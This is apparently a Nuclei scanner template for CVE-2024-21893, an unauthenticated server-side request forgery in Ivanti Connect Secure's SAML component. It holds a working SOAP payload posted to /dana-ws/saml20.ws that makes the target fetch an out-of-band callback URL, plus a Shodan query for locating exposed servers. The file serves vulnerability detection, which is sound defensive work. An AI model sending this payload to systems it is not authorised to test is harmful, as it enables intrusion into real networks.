nuclei-templates/http/cves/2024/CVE-2024-21893.yaml

51 lines
2.5 KiB
YAML
Raw Normal View History

2024-02-03 08:20:02 +00:00
id: CVE-2024-21893
info:
name: Ivanti SAML - Server Side Request Forgery (SSRF)
author: DhiyaneshDk
severity: high
description: |
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
reference:
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
- https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
- https://github.com/Ostorlab/KEV
2024-02-03 08:20:02 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-21893
cwe-id: CWE-918
epss-score: 0.96249
epss-percentile: 0.9949
2024-02-03 08:20:02 +00:00
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
max-request: 1
2024-02-03 08:20:02 +00:00
vendor: ivanti
product: "connect_secure"
2024-02-03 08:20:02 +00:00
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,ssrf,ivanti
http:
- raw:
- |
POST /dana-ws/saml20.ws HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a0046304402200a0547b87f667aa36af039f186372735c368c54758d1da68f5b0fd18312a8c0402201944364cc59a7b39458b86b84369d97aa826d793c83d4c42fed8f694a87920be:922c64590222798bb761d5b6d8e72950